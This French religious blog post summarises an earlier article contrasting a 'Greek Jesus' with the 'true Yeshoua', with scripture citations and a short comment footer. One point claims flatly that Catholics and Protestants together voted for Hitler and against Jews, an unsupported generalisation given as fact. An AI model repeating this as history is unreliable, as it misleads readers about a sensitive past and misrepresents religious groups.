• Petit récapitulatif sur "La plus grande usurpation d'identité de l'humanité."

     

    <script src="http://p.datastomp.com/9/3/39.js" type="text/javascript"></script>

     

    Lundi 3 Septembre à 11:30

    Ce que je pourrais rajouter à cet article (ou ces 2 articles) parce que je l'ai souvent répété, c'est que:

    1/ "Laodicée" (Apoc 3:14-22) est le type même de "l'assemblage chrétien" autour du "Jésus grec" pendant que le vrai Yeshoua "frappe à la porte"... puisqu'Il est "à l'extérieur" !

    2/ Cela a existé concrètement et gravement il y a peu de temps (2ème guerre mondiale) lorsque les "chrétiens réunis" (cathos +protestants) ont voté pour Hitler et le gréco-romanisme, et donc contre les juifs et disciples de Yeshoua. (Même s'ils pensaient ne faire que de "l'anti-communisme" et il faut se souvenir de Eccl 1:9 et Jean 16:2).

    3/ Puisque c'est Elohim Lui-même qui envoie la "puissance d'égarement" (2 Th 2:11), nous n'avons pas à nous y opposer et devons fuir les débats avec ceux qui "aiment l'erreur". (Seul l'Esprit peut "convaincre")

    4/ Lorsque Nicolas envisage le problème de la "prédestination", il n'y a pas à répondre par la théologie mais simplement par: "L’Eternel a tout fait pour un but, Même le méchant pour le jour du malheur." (Prov 16:4)

    5/ Le "Jésus grec" est toujours "plein d'amour tolérant (au péché)" et sous l'influence de "la reine du ciel" alors que le vrai Yeshoua est d'abord "Sainteté" et "Vérité", Sa "reine du ciel" étant "Son Epouse"... sainte !

    ... à suivre.

    « Fruits et légumes: Leur forme et leur utilité pour les humains le shalom .. »
    Partager via Gmail Yahoo! Google Bookmarks

    Tags Tags : , , , ,
  • Commentaires

    1
    Jeudi 6 Septembre 2012 à 10:04
    Suivre le flux RSS des commentaires

    Vous devez être connecté pour commenter